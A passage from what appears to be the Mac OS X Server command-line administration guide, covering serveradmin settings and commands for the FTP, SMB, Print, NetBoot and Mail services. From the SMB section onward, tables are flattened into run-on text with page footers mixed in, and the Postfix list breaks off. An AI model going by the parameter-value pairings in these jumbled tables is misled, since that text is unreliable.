To list all FTP service settings:
$ sudo serveradmin settings ftp
To list a particular setting:
$ sudo serveradmin settings ftp:setting
To list a group of settings:
You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example,
$ sudo serveradmin settings ftp:logCommands:*

Changing FTP Settings
You can change FTP service settings using the serveradmin application.
To change a setting:
$ sudo serveradmin settings ftp:setting = value
To change several settings:
$ sudo serveradmin settings
ftp:setting = value
ftp:setting = value
ftp:setting = value
[...]
Control-D
Parameters:
setting: An FTP service setting. To see a list of available settings, type $ sudo serveradmin settings ftp or see "FTP Settings" on this page.
value: An appropriate value for the setting.

FTP Settings
Use the following parameters with the serveradmin command to change settings for the FTP service. (Parameter names are prefixed with ftp: when used with serveradmin.)
administratorEmailAddress: Default = "user@hostname"
anonymous-root: Default = "/Library/FTPServer/FTPRoot"
anonymousAccessPermitted: Default = no
authLevel: Default = "STANDARD"
bannerMessage: Default = "This is the "Banner" message for the Mac OS X Server's FTP server process. FTP clients will receive this message immediately before being prompted for a name and password. PLEASE NOTE: Some FTP clients may exhibit problems if you make this file too long. ----------------------------------"
chrootType: Default = "STANDARD"
enableMacBinAndDmgAutoConversion: Default = yes
ftpRoot: Default = "/Library/FTPServer/FTPRoot"
logCommands:anonymous: Default = no
logCommands:guest: Default = no
logCommands:real: Default = no
loginFailuresPermitted: Default = 3
logSecurity:anonymous: Default = no
logSecurity:guest: Default = no
logSecurity:real: Default = no
logToSyslog: Default = no
logTransfers:anonymous:inbound: Default = yes
logTransfers:anonymous:outbound: Default = yes
logTransfers:guest:inbound: Default = no
logTransfers:guest:outbound: Default = no
logTransfers:real:inbound: Default = yes
logTransfers:real:outbound: Default = yes
maxAnonymousUsers: Default = 50
maxRealUsers: Default = 50
showBannerMessage: Default = yes
showWelcomeMessage: Default = yes
welcomeMessage: Default = "This is the "Welcome" message for the Mac OS X Server's FTP server process. FTP clients will receive this message right after a successful log in. ----------------------------------"
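As a quick illustration, a hypothetical setup that permits anonymous FTP but limits it to 25 simultaneous anonymous users could be configured like this (the values shown are illustrative):
$ sudo serveradmin settings ftp:anonymousAccessPermitted = yes
$ sudo serveradmin settings ftp:maxAnonymousUsers = 25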
List of FTP serveradmin Commands
You can use the following commands with the serveradmin application to manage FTP service. (Each command is issued as the value of ftp:command.)
getConnectedUsers: List connected users. See "Checking for Connected FTP Users" on page 80.
getLogPaths: Show location of the FTP transfer log file. See "Viewing the FTP Transfer Log" on this page.
writeSettings: Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See "Determining Whether a Service Needs to be Restarted" on page 19.

Viewing the FTP Transfer Log
You can use tail or any other file listing tool to view the contents of the FTP transfer log.
To view the latest entries in the transfer log:
$ tail log-file
The default location of log-file is /Library/Logs/FTP.transfer.log.
You can use the serveradmin getLogPaths command to see where the current transfer log is located.
To display the log path:
$ sudo serveradmin command ftp:command = getLogPaths

Checking for Connected FTP Users
To see how many FTP users are connected:
$ ftpcount
or
$ sudo serveradmin command ftp:command = getConnectedUsers

Windows (SMB) Service

Starting and Stopping SMB Service
To start SMB service:
$ sudo serveradmin start smb
To stop SMB service:
$ sudo serveradmin stop smb

Checking SMB Service Status
To see if SMB service is running:
$ sudo serveradmin status smb
To see complete SMB status:
$ sudo serveradmin fullstatus smb

Viewing SMB Settings
To list all SMB service settings:
$ sudo serveradmin settings smb
To list a particular setting:
$ sudo serveradmin settings smb:setting
setting: An SMB service setting. To see a list of available settings, type $ sudo serveradmin settings smb or see "List of SMB Service Settings" on page 82.
To list a group of settings:
You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example,
$ sudo serveradmin settings smb:adminCommands:*

Changing SMB Settings
You can change SMB service settings using the serveradmin command.
To change a setting:
$ sudo serveradmin settings smb:setting = value
To change several settings:
$ sudo serveradmin settings
smb:setting = value
smb:setting = value
smb:setting = value
[...]
Control-D
Parameters:
setting: An SMB service setting. To see a list of available settings, type $ sudo serveradmin settings smb or see "List of SMB Service Settings" on page 82.
value: An appropriate value for the setting. For a list of values that correspond to GUI controls in the Server Admin application, see "List of SMB Service Settings" on page 82.

List of SMB Service Settings
Use the following parameters with the serveradmin command to change settings for the SMB service.
Can be set to: "standalone" "domainmember" "primarydomaincontroller" Corresponds to the Role pop-up menu in the General pane of Windows service settings in the Server Admin GUI application. domain master Whether the server is providing domain master browser service. Can be set to: yes | no Corresponds to the Domain Master Browser checkbox in the Advanced pane of Window service settings in the Server Admin GUI application. dos charset The code page being used. Can be set to: CP437 (Latin US) CP737 (Greek) CP775 (Baltic) CP850 (Latin1) CP852 (Latin2) CP861 (Icelandic) CP866 (Cyrillic) CP932 (Japanese SJIS) CP936 (Simplified Chinese) CP949 (Korean Hangul) CP950 (Traditional Chinese) CP1251 (Windows Cyrillic) Corresponds to the Code Page pop-up menu on the Advanced pane of Windows service settings in the Server Admin GUI application. LL2354.book Page 82 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 83 local master Whether the server is providing workgroup master browser service. Can be set to: yes | no Corresponds to the Workgroup Master Browser checkbox in the Advanced pane of Window service settings in the Server Admin GUI application. log level The amount of detail written to the service logs. Can be set to: 0 (Low: errors and warnings only) 1 (Medium: service start and stop, authentication failures, browser name registrations, and errors and warnings) 2 (High: service start and stop, authentication failures, browser name registration events, log file access, and errors and warnings) Corresponds to the Log Detail pop-up menu in the Logging pane of Window service settings in the Server Admin GUI application map to guest Whether guest access is allowed. Can be set to: "Never" (No guest access) "Bad User" (Allow guest access) Corresponds to the “Allow Guest access” checkbox in the Access pane of Window service settings in the Server Admin GUI application max smbd processes The maximum allowed number of smb server processes. Each connection uses its own smbd process, so this is the same as specifying the maximum number of SMB connections. 0 means unlimited. This corresponds to the “maximum” client connections field in the Access pane of the Windows service settings in the Server Admin GUI application. netbios name The server’s NetBIOS name. Can be set to a maximum of 15 bytes of UTF-8 characters. Corresponds to the Computer Name field in the General pane of the Windows service settings in the Server Admin GUI application. server string Text that helps identify the server in the network browsers of client computers. Can be set to a maximum of 15 bytes of UTF-8 characters. Corresponds to the Description field in the General pane of the Windows service settings in the Server Admin GUI application. wins support Whether the server provides WINS support. Can be set to: yes | no Corresponds to the WINS Registration “Off” and “Enable WINS server” selections in the Advanced pane of the Windows service settings in the Server Admin GUI application. Parameter (smb:) Description LL2354.book Page 83 Monday, October 20, 2003 9:47 AM 84 Chapter 8 Working With File Services List of SMB serveradmin Commands You can use these commands with the serveradmin tool to manage SMB service. Listing SMB Users You can use the serveradmin getConnectedUsers command to retrieve information about connected SMB users. For example, you can use this command to retrieve the session IDs you need to disconnect users. 
To list connected users: $serveradmin command smb:command = getConnectedUsers wins server The name of the WINS server used by the server. Corresponds to the WINS Registration “Register with WINS server” selection and field in the Advanced pane of the Windows service settings in the Server Admin GUI application. workgroup The server’s workgroup. Can be set to a maximum of 15 bytes of UTF-8 characters. Corresponds to the Workgroup field in the General pane of the Windows service settings in the Server Admin GUI application. Parameter (smb:) Description smb:command= Description disconnectUsers Disconnect SMB users. See “Disconnecting SMB Users” on page 85. getConnectedUsers List users currently connected to an SMB service. See “Listing SMB Users” on this page. getHistory List connection statistics. See “Listing SMB Service Statistics” on page 86. getLogPaths Show location of service log files. See “Viewing SMB Service Logs” on page 87. syncPrefs Update the service to recognize changes in share points. See “Updating Share Point Information” on page 86. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. LL2354.book Page 84 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 85 Output The following array of settings is displayed for each connected user: smb:usersArray:_array_index:i:disconnectID = <disconnectID> smb:usersArray:_array_index:i:sessionID = <sessionID> smb:usersArray:_array_index:i:connectAt = <connect-time> smb:usersArray:_array_index:i:service = <service> smb:usersArray:_array_index:i:loginElapsedTime = <login-elapsed-time> smb:usersArray:_array_index:i:name = "<name>" smb:usersArray:_array_index:i:ipAddress = "<ip-address>" Disconnecting SMB Users You can use the serveradmin disconnectUsers command to disconnect SMB users. Users are specified by session ID. To disconnect users: $ sudo serveradmin command smb:command = disconnectUsers smb:sessionIDsArray:_array_index:0 = sessionid1 smb:sessionIDsArray:_array_index:1 = sessionid2 smb:sessionIDsArray:_array_index:2 = sessionid3 [...] Control-D Output smb:command = "disconnectUsers" smb:status = <status> Value returned by getConnectedUsers (smb:usersArray:_array_index:<n>:) Description <sessionID> An integer that identifies the user session. <connect-time> The date and time when the user connected to the server. <service> The share point the user is accessing. <login-elapsed-time> The elapsed time since the user connected. <name> The user’s name. <ip-address> The user’s IP address. Parameter Description sessionidn The session ID of a user you want to disconnect. To list the session IDs of connected users, use the getConnectedUsers command. See “Listing SMB Users” on page 84. Value Description <status> A command status code: 0 = command successful LL2354.book Page 85 Monday, October 20, 2003 9:47 AM 86 Chapter 8 Working With File Services Listing SMB Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of SMB connections. Samples are taken once each minute. To list samples: $ sudo serveradmin command smb:command = getHistory smb:variant = v1 smb:timeScale = scale Control-D Output smb:nbSamples = <samples> smb:samplesArray:_array_index:0:vn = <sample> smb:samplesArray:_array_index:0:t = <time> smb:samplesArray:_array_index:1:vn = <sample> smb:samplesArray:_array_index:1:t = <time> [...] 
smb:samplesArray:_array_index:i:vn = <sample> smb:samplesArray:_array_index:i:t = <time> smb:v1Legend = "CONNECTIONS" smb:currentServerTime = <servertime> Updating Share Point Information After you make a change to an SMB share point using the sharing tool, you need to update the SMB service information. To update SMB share point information: $ sudo serveradmin command smb:command = syncPrefs Parameter Description v1 The number of connected users (average during sampling period). scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify smb:timeScale = 1800. Value displayed by getHistory Description <samples> The total number of samples listed. <legend> A textual description of the selected statistic. "CONNECTIONS" for v1 "THROUGHPUT" for v2 <sample> The numerical value of the sample. For connections (v1), this is integer average number of users. For throughput, (v2), this is integer bytes per second. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970.) Samples are taken every 60 seconds. LL2354.book Page 86 Monday, October 20, 2003 9:47 AM Chapter 8 Working With File Services 87 Viewing SMB Service Logs You can use tail or any other file listing tool to view the contents of the SMB service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current SMB logs are located. To display the log paths: $ sudo serveradmin command smb:command = getLogPaths Output smb:fileServiceLog = <smb-log> smb:nameServiceLog = <name-log> Value Description <smb-log> The location of the SMB service log. Default = /var/log/samba/log.smbd <name-log> The location of the name service log. Default = /var/log/samba/log.nmbd LL2354.book Page 87 Monday, October 20, 2003 9:47 AM LL2354.book Page 88 Monday, October 20, 2003 9:47 AM 9 89 9 Working With Print Service Commands you can use to manage the Print service in Mac OS X Server. Starting and Stopping Print Service To start Print service: $ sudo serveradmin start print To stop Print service: $ sudo serveradmin stop print Checking the Status of Print Service To see summary status of Print service: $ sudo serveradmin status print To see detailed status of Print service: $ sudo serveradmin fullstatus print Viewing Print Service Settings To list Print service configuration settings: $ sudo serveradmin settings print To list a particular setting: $ sudo serveradmin settings print:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example, to see all settings for a particular print queue: $ sudo serveradmin settings print:queuesArray:_array_id:queue-id:* where queue-id is an id such as 66F66AdA-060B-5603-9024-FCB57AAB24B1. LL2354.book Page 89 Monday, October 20, 2003 9:47 AM 90 Chapter 9 Working With Print Service Changing Print Service Settings To change a setting: $ sudo serveradmin settings print:setting = value To change several settings: $ sudo serveradmin settings print:setting = value print:setting = value print:setting = value [...] Control-D Print Service Settings Use the following parameters with the serveradmin command to change settings for the Print service. Parameter Description setting A Print service setting. 
To see a list of available settings, type $ sudo serveradmin settings print or see “Print Service Settings” on this page. value An appropriate value for the setting. Parameter (print:) Description serverLogArchiveIntervalDays Default = 7 <queue arrays> See “Queue Data Array” on page 91. serverLogArchiveEnable Default = no jobLogArchiveIntervalDays Default = 7 jobLogArchiveEnable Default = no LL2354.book Page 90 Monday, October 20, 2003 9:47 AM Chapter 9 Working With Print Service 91 Queue Data Array Print service settings include an array of values for each existing print queue. The array is a set of 14 parameters that define values for each queue. <id> is the queue ID, for example, 29D3ECF3-17C8-16E5-A330-84CEC733F249. Parameter (print:) Description queuesArray:_array_id:<id>: quotasEnforced Default = no queuesArray:_array_id:<id>: sharingList:_array_index:0: service Default = "LPR" queuesArray:_array_id:<id>: sharingList:_array_index:0: sharingEnable Default = no queuesArray:_array_id:<id>: sharingList:_array_index:1: service Default = "SMB" queuesArray:_array_id:<id>: sharingList:_array_index:1: sharingEnable Default = no queuesArray:_array_id:<id>: sharingList:_array_index:2: service Default = "PAP" queuesArray:_array_id:<id>: sharingList:_array_index:2: sharingEnable Default = no queuesArray:_array_id:<id>: shareable Default = yes. Cannot be changed. queuesArray:_array_id:<id>: defaultJobPriority Not used. Default = "NORMAL" queuesArray:_array_id:<id>: printerName Default = "<printer-name>" Cannot be changed using serveradmin. queuesArray:_array_id:<id>: defaultJobState Not used. Default = "PENDING" queuesArray:_array_id:<id>: printerURI Default = <uri> Format depends on type of printer. Cannot be changed using serveradmin. queuesArray:_array_id:<id>: registerRendezvous Default = yes queuesArray:_array_id:<id>: printerKind Default = "<type>" Cannot be changed using serveradmin. 
queuesArray:_array_id:<id>: sharingName Default = "<name>" LL2354.book Page 91 Monday, October 20, 2003 9:47 AM 92 Chapter 9 Working With Print Service Here is an example of a queue array parameter block: print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:quotasEnforced = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:0:service = "LPR" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:0:sharingEnable = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:1:service = "SMB" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:1:sharingEnable = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:2:service = "PAP" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:sharingList:_array_index:2:sharingEnable = no print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:shareable = yes print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:defaultJobPriority = "NORMAL" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:printerName = "Room 3 Printer" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:defaultJobState = "PENDING" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:printerURI = "pap://*/Room%203%20Printer/LaserWriter" print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330- 84CEC733F249:registerRendezvous = yes print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:printerKind = "HP LaserJet 4100 Series " print:queuesArray:_array_id:29D3ECF3-17C8-16E5-A330-84CEC733F249:sharingName = "Room 3 Printer" LL2354.book Page 92 Monday, October 20, 2003 9:47 AM Chapter 9 Working With Print Service 93 Print Service serveradmin Commands You can use the following commands with the serveradmin application to manage Print service. Listing Queues You can use the serveradmin getQueues command to list Print service queues. $ sudo serveradmin command print:command = getQueues Pausing a Queue You can use the serveradmin setQueueState command to pause or release a queue. To pause a queue: $ sudo serveradmin command print:command = setQueueState print:status = PAUSED print:namesArray:_array_index:0 = queue Control-D To release the queue: $ sudo serveradmin command print:command = setQueueState print:status = "" print:namesArray:_array_index:0 = queue Control-D print:command= Description getJobs List information about the jobs waiting in a queue. See “Listing Jobs and Job Information” on page 94. getLogPaths Finding the locations of the Print service and job logs. See “Viewing Print Service Log Files” on page 95. getQueues List Print service queues. See “Listing Queues” on this page. setJobState Hold or release a job. See “Holding a Job” on page 94. setQueueState Pauses or release a queue. See “Pausing a Queue” on this page. writeSettings Equivalent to the standard serveradmin settings command, but also returns a setting indicating whether the service needs to be restarted. See “Determining Whether a Service Needs to be Restarted” on page 19. Parameter Description queue The name of the queue. To find the name of the queue, use the getQueues command and look for the value of the print setting. See “Listing Queues” on this page. 
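For example, to pause and then release the queue from the sample queue array shown earlier, you could substitute its sharing name for the queue placeholder. This is only an illustration; "Room 3 Printer" comes from the example block above, and the quoting of a name containing spaces is an assumption:
$ sudo serveradmin command
print:command = setQueueState
print:status = PAUSED
print:namesArray:_array_index:0 = "Room 3 Printer"
Control-D
To release it, repeat the command with print:status = "".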
LL2354.book Page 93 Monday, October 20, 2003 9:47 AM 94 Chapter 9 Working With Print Service Listing Jobs and Job Information You can use the serveradmin getJobs command to list information about print jobs. $ sudo serveradmin command print:command = getJobs print:maxDisplayJobs = jobs print:queueNamesArray:_array_index:0 = queue Control-D For each job, the command lists: • Document name • Number of pages • Document size • Number of sheets • Job ID • Submitting user • Submitting host • Job name • Job state • Printing protocol • Job priority Holding a Job You can use the serveradmin setJobState command to hold or release a job. To hold a job: $ sudo serveradmin command print:command = setJobState print:status = HOLD print:namesArray:_array_index:0:printer = queue print:namesArray:_array_index:0:idsArray:_array_index:0 = jobid Control-D Parameter Description jobs The maximum number of jobs to list. queue The name of the queue. To find the name of the queue, use the getQueues command and look for the value of the print setting. See “Listing Queues” on page 93. Parameter Description queue The name of the queue. To find the name of the queue, use the getQueues command and look for the value of the print setting. See “Listing Queues” on page 93. jobid The ID of the job. To find the ID of the job, use the getJobs command and look for the value of the jobId setting. See “Listing Jobs and Job Information” on this page. LL2354.book Page 94 Monday, October 20, 2003 9:47 AM Chapter 9 Working With Print Service 95 To release the job for printing, change its state to PENDING. To release the job: $ sudo serveradmin command print:command = setJobState print:status = PENDING print:namesArray:_array_index:0:printer = queue print:namesArray:_array_index:0:idsArray:_array_index:0 = jobid Control-D Viewing Print Service Log Files You can use tail or any other file listing tool to view the contents of the Print service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current logs are located. To display the log paths: $ sudo serveradmin command print:command = getLogPaths Output print:logPathsArray:_array_index:0:path = <service-log> print:logPathsArray:_array_index:0:name = SYSTEMLOG print:logPathsArray:_array_index:0:path = <job-log-0> print:logPathsArray:_array_index:0:path = <queue-name-0> print:logPathsArray:_array_index:0:path = <job-log-1> print:logPathsArray:_array_index:0:path = <queue-name-1> [...] print:logPathsArray:_array_index:0:path = <job-log-n> print:logPathsArray:_array_index:0:path = <queue-name-n> Value Description <service-log> The location of the primary Print service log. Default = /Library/Logs/PrintService/ PrintService.server.log <job-log-n> The location of the job log for the corresponding queue. Default = /Library/Logs/PrintService/ PrintService.<queue-name-n>.job.log <queue-name-n> The name of the queue. LL2354.book Page 95 Monday, October 20, 2003 9:47 AM LL2354.book Page 96 Monday, October 20, 2003 9:47 AM 10 97 10 Working With NetBoot Service Commands you can use to manage the NetBoot service in Mac OS X Server. Starting and Stopping NetBoot Service To start NetBoot service: $ sudo serveradmin start netboot If you get the following response: $ netboot:state = "STOPPED" $ netboot:status = 5000 you have not yet enabled NetBoot on any network port. 
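In that case, you can enable the service on a network port before starting it. The following is only a sketch using the port record parameters described in "Port Record Array" later in this chapter; the index 0, the port name, and the en0 device are assumptions about your hardware, and a working NetBoot setup also needs image and storage records:
$ sudo serveradmin settings
netboot:netBootPortsRecordsArray:_array_index:0:isEnabledAtIndex = "Yes"
netboot:netBootPortsRecordsArray:_array_index:0:nameAtIndex = "Built-in Ethernet"
netboot:netBootPortsRecordsArray:_array_index:0:deviceAtIndex = "en0"
Control-D
$ sudo serveradmin start netboot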
To stop NetBoot service: $ sudo serveradmin stop netboot Checking NetBoot Service Status To see if NetBoot service is running: $ sudo serveradmin status netboot To see complete NetBoot status: $ sudo serveradmin fullstatus netboot Viewing NetBoot Settings To list all NetBoot service settings: $ sudo serveradmin settings netboot LL2354.book Page 97 Monday, October 20, 2003 9:47 AM 98 Chapter 10 Working With NetBoot Service Changing NetBoot Settings You can change NetBoot service settings using the serveradmin command. To change a setting: $ sudo serveradmin settings netboot:setting = value To change several settings: $ sudo serveradmin settings netboot:setting = value netboot:setting = value netboot:setting = value [...] Control-D NetBoot Service Settings General Settings Use the following parameters with the serveradmin command to change settings for the NetBoot service. Parameter Description setting A NetBoot service setting. To see a list of available settings, type $ sudo serveradmin settings netboot or see “NetBoot Service Settings” on this page. value An appropriate value for the setting. Parameter (netboot:) Description filterEnabled Specifies whether client filtering is enabled. Default = "No" netBootStorageRecordsArray... An array of values for each server volume used to store boot or install images. For a description, see “Storage Record Array” on page 99. netBootFiltersRecordsArray... An array of values for each computer explicitly allowed or disallowed access to images. For a description, see “Filters Record Array” on page 99. netBootImagesRecordsArray... An array of values for each boot or install image stored on the server. For a description, see “Image Record Array” on page 100. netBootPortsRecordsArray... An array of values for each server network port used to deliver boot or install images. For a description, see “Port Record Array” on page 101. LL2354.book Page 98 Monday, October 20, 2003 9:47 AM Chapter 10 Working With NetBoot Service 99 Storage Record Array A volume parameter array: Filters Record Array An array of the following values appears in the NetBoot service settings for each computer explicitly allowed or denied access to images stored on the server: Parameter (netboot:) Description netBootStorageRecordsArray:_array_index:<n>: sharepoint First parameter in an array describing a volume available to serve images. Default = "No" netBootStorageRecordsArray:_array_index:<n>: clients Default = "No" netBootStorageRecordsArray:_array_index:<n>: ignorePrivs Default = "false" netBootStorageRecordsArray:_array_index:<n>: volType Default = <voltype> Example: "hfs" netBootStorageRecordsArray:_array_index:<n>: path Default = "/" netBootStorageRecordsArray:_array_index:<n>: volName Default = <name> netBootStorageRecordsArray:_array_index:<n>: volIcon Default = <icon> netBootStorageRecordsArray:_array_index:<n>: okToDeleteClients Default = "Yes" netBootStorageRecordsArray:_array_index:<n>: okToDeleteSharepoint Default = "Yes" Parameter (netboot:) Description: netBootFiltersRecordsArray: _array_index:<n>:hostName The host name of the filtered computer, if available. netBootFiltersRecordsArray: _array_index:<n>:filterType Whether the specified computer is allowed or denied access. Options: "allow" "deny" netBootFiltersRecordsArray: _array_index:<n>:hardwareAddress The Ethernet hardware (MAC) address of the filtered computer. 
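As a hedged illustration of a filter entry, the following would deny a single computer by its hardware address and turn filtering on. The index, host name, and MAC address are placeholders, not values from your configuration:
$ sudo serveradmin settings
netboot:filterEnabled = "Yes"
netboot:netBootFiltersRecordsArray:_array_index:0:hostName = "lab-mac-01"
netboot:netBootFiltersRecordsArray:_array_index:0:filterType = "deny"
netboot:netBootFiltersRecordsArray:_array_index:0:hardwareAddress = "00:03:93:aa:bb:cc"
Control-D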
LL2354.book Page 99 Monday, October 20, 2003 9:47 AM 100 Chapter 10 Working With NetBoot Service Image Record Array An array of the following values appears in the NetBoot service settings for each image stored on the server: Parameter (netboot:) Description: netBootImagesRecordsArray: _array_index:<n>:Name Name of the image as it appears in the Startup Disk control panel (Mac OS 9) or Preferences pane (Mac OS X). netBootImagesRecordsArray: _array_index:<n>:IsDefault Yes specifies this image file as the default boot image on the subnet. netBootImagesRecordsArray: _array_index:<n>:RootPath The path to the .dmg file. netBootImagesRecordsArray: _array_index:<n>:isEdited netBootImagesRecordsArray: _array_index:<n>:BootFile Name of boot ROM file: booter. netBootImagesRecordsArray: _array_index:<n>:Description Arbitrary text describing the image. netBootImagesRecordsArray: _array_index:<n>:SupportsDiskless Yes directs the NetBoot server to allocate space for the shadow files needed by diskless clients. netBootImagesRecordsArray: _array_index:<n>:Type NFS or HTTP. netBootImagesRecordsArray: _array_index:<n>:pathToImage The path to the parameter list file in the .nbi folder on the server describing the image. netBootImagesRecordsArray: _array_index:<n>:Index 1–4095 indicates a local image unique to the server. 4096–65535 is a duplicate, identical image stored on multiple servers for load balancing. netBootImagesRecordsArray: _array_index:<n>:IsEnabled Sets whether the image is available to NetBoot (or Network Image) clients. netBootImagesRecordsArray: _array_index:<n>:IsInstall Yes specifies a Network Install image; False specifies a NetBoot image. LL2354.book Page 100 Monday, October 20, 2003 9:47 AM Chapter 10 Working With NetBoot Service 101 Port Record Array An array of the following items is included in the NetBoot service settings for each network port on the server set to deliver images: Parameter (netboot:) Description netBootPortsRecordsArray:_array_index:<m>: isEnabledAtIndex First parameter in an array describing a network interface available for responding to netboot requests. Default = "No" netBootPortsRecordsArray:_array_index:<m>: nameAtIndex Default = "<devname>" Example: "Built-in Ethernet" netBootPortsRecordsArray:_array_index:<m>: deviceAtIndex Default = "<dev>" Example: "en0" LL2354.book Page 101 Monday, October 20, 2003 9:47 AM LL2354.book Page 102 Monday, October 20, 2003 9:47 AM 11 103 11 Working With Mail Service Commands you can use to manage the Mail service in Mac OS X Server. Starting and Stopping Mail Service To start Mail service: $ sudo serveradmin start mail To stop Mail service: $ sudo serveradmin stop mail Checking the Status of Mail Service To see summary status of Mail service: $ sudo serveradmin status mail To see detailed status of Mail service: $ sudo serveradmin fullstatus mail Viewing Mail Service Settings To list Mail service configuration settings: $ sudo serveradmin settings mail To list a particular setting: $ sudo serveradmin settings mail:setting To list a group of settings: You can list a group of settings that have part of their names in common by typing only as much of the name as you want, stopping at a colon (:), and typing an asterisk (*) as a wildcard for the remaining parts of the name. For example: $ sudo serveradmin settings mail:imap:* LL2354.book Page 103 Monday, October 20, 2003 9:47 AM 104 Chapter 11 Working With Mail Service Changing Mail Service Settings You can use serveradmin to modify your server’s mail configuration. 
However, if you want to work with the Mail service from the command-line, you’ll probably find it more straightforward to work directly with the underlying Postfix and Cyrus mail services. For information on Postfix, visit www.postfix.org. For information on Cyrus IMAP/POP, visit asg.web.cmu.edu/cyrus. You can also use Sherlock or Google to search the web for information on Postfix or Cyrus. Mail Service Settings Use the following parameters with the serveradmin command to change settings for the Mail service. Parameter (mail:) Description postfix:message_size_limit Default = 10240000 postfix:readme_directory Default = no postfix:double_bounce_sender Default = "double-bounce" postfix:default_recipient_limit Default = 10000 postfix:local_destination_recipient_limit Default = 1 postfix:queue_minfree Default = 0 postfix:show_user_unknown_table_name Default = yes postfix:default_process_limit Default = 100 postfix:export_environment Default = "TZ MAIL_CONFIG" postfix:smtp_line_length_limit Default = 990 postfix:smtp_rcpt_timeout Default = "300s" postfix:masquerade_domains Default = "" postfix:soft_bounce Default = no postfix:pickup_service_name Default = "pickup" postfix:config_directory Default = "/etc/postfix" postfix:smtpd_soft_error_limit Default = 10 postfix:undisclosed_recipients_header Default = "To: undisclosed- recipients:;" postfix:lmtp_lhlo_timeout Default = "300s" postfix:smtpd_recipient_restrictions Default = "permit_mynetworks,reject _unauth_destination" postfix:unknown_local_recipient_reject_code Default = 450 LL2354.book Page 104 Monday, October 20, 2003 9:47 AM Chapter 11 Working With Mail Service 105 postfix:error_notice_recipient Default = "postmaster" postfix:smtpd_sasl_local_domain Default = no postfix:strict_mime_encoding_domain Default = no postfix:unknown_relay_recipient_reject_code Default = 550 postfix:disable_vrfy_command Default = no postfix:unknown_virtual_mailbox_reject_code Default = 550 postfix:fast_flush_refresh_time Default = "12h" postfix:prepend_delivered_header Default = "command, file, forward" postfix:defer_service_name Default = "defer" postfix:sendmail_path Default = "/usr/sbin/sendmail" postfix:lmtp_sasl_password_maps Default = no postfix:smtp_sasl_password_maps Default = no postfix:qmgr_clog_warn_time Default = "300s" postfix:smtp_sasl_auth_enable Default = no postfix:smtp_skip_4xx_greeting Default = yes postfix:smtp_skip_5xx_greeting Default = yes postfix:stale_lock_time Default = "500s" postfix:strict_8bitmime_body Default = no postfix:disable_mime_input_processing Default = no postfix:smtpd_hard_error_limit Default = 20 postfix:empty_address_recipient Default = "MAILER-DAEMON" postfix:forward_expansion_filter Default = "1234567890!@%- _=+:,./abcdefghijklmnopqr stuvwxyzABCDEFGHIJKLMNOPQ RSTUVWXYZ" postfix:smtpd_expansion_filter Default = "\t\40!"#$%&'()*+,- ./0123456789:;<=>?@ABCDEF GHIJKLMNOPQRSTUVWXYZ[\\]^ _`abcdefghijklmnopqrstuvw xyz{|}~" postfix:relayhost Default = "" postfix:defer_code Default = 450 postfix:lmtp_rset_timeout Default = "300s" postfix:always_bcc Default = "" postfix:proxy_interfaces Default = "" postfix:maps_rbl_reject_code Default = 554 Parameter (mail:) Description LL2354.book Page 105 Monday, October 20, 2003 9:47 AM 106 Chapter 11 Working With Mail Service postfix:line_length_limit Default = 2048 postfix:mailbox_transport Default = 0 postfix:deliver_lock_delay Default = "1s" postfix:best_mx_transport Default = 0 postfix:notify_classes Default = "resource,software" postfix:mailbox_command Default = "" postfix:mydomain Default 
= <domain> postfix:mailbox_size_limit Default = 51200000 postfix:default_verp_delimiters Default = "+=" postfix:resolve_dequoted_address Default = yes postfix:cleanup_service_name Default = "cleanup" postfix:header_address_token_limit Default = 10240 postfix:lmtp_connect_timeout Default = "0s" postfix:strict_7bit_headers Default = no postfix:unknown_hostname_reject_code Default = 450 postfix:virtual_alias_domains Default = "$virtual_alias_maps" postfix:lmtp_sasl_auth_enable Default = no postfix:queue_directory Default = "/private/var/ spool/postfix" postfix:sample_directory Default = "/usr/share/doc/ postfix/examples" postfix:fallback_relay Default = 0 postfix:smtpd_use_pw_server Default = "yes" postfix:smtpd_sasl_auth_enable Default = no postfix:mail_owner Default = "postfix" postfix:command_time_limit Default = "1000s" postfix:verp_delimiter_filter Default = "-=+" postfix:qmqpd_authorized_clients Default = 0 postfix:virtual_mailbox_base Default = "" postfix:permit_mx_backup_networks Default = "" postfix:queue_run_delay Default = "1000s" postfix:virtual_mailbox_domains Default = "$virtual_mailbox_maps" postfix:local_destination_concurrency_limit Default = 2 postfix:daemon_timeout Default = "18000s" Parameter 